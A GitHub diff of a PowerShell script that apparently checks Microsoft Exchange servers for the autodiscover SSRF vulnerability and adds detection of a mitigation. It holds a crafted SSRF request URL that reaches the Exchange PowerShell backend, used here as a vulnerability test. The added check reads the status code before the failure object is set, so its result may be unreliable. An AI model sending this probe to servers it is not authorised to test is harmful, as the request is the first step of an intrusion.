| skipped 6 lines |
| 7 | 7 | | Write-host "Running autodiscover test..." -ForegroundColor Cyan |
| 8 | 8 | | try |
| 9 | 9 | | { |
| 10 | | - | $webtest1 = Invoke-WebRequest -uri "https://$target/autodiscover" -Verbose |
| | 10 | + | $webtest1 = Invoke-WebRequest -uri "https://$target/autodiscover" -Verbose -DisableKeepAlive |
| 11 | 11 | | } |
| 12 | 12 | | catch |
| 13 | 13 | | { |
| skipped 1 lines |
| 15 | 15 | | $Failure = $_.Exception.Response |
| 16 | 16 | | $Failure.Headers.tostring() |
| 17 | 17 | | } |
| 18 | | - | |
| 19 | | - | |
| 20 | 18 | | |
| 21 | 19 | | Write-host "Running autodiscover SSRF test..." -ForegroundColor Cyan |
| 22 | 20 | | try |
| 23 | 21 | | { |
| 24 | 22 | | write-host "testing site..." -ForegroundColor Gray |
| 25 | | - | $webtest2 = invoke-webrequest -uri "https://$target/autodiscover/[email protected]/owa/&Email=autodiscover/[email protected]&Protocol=HACKER&Protocol=PowerShell" -Verbose |
| | 23 | + | $webtest2 = invoke-webrequest -uri "https://$target/autodiscover/[email protected]/owa/&Email=autodiscover/[email protected]&Protocol=HACKER&Protocol=PowerShell" -Verbose -DisableKeepAlive |
| 26 | 24 | | } |
| 27 | 25 | | catch |
| 28 | 26 | | { |
| 29 | 27 | | write-host "Caught" -ForegroundColor Red |
| | 28 | + | $failure.StatusCode |
| | 29 | + | if($failure.StatusCode -contains "BadGateway"){write-host "Mitigation Detected" -ForegroundColor Green} |
| 30 | 30 | | $Failure = $_.Exception.Response |
| 31 | 31 | | $Failure.Headers.tostring() |
| 32 | 32 | | $Failure.Headers.tostring() | findstr /I "X-OWA-Version" |
| skipped 26 lines |
Daniel Card
committed
with
GitHub
2 years ago
1 parent b9a1ed12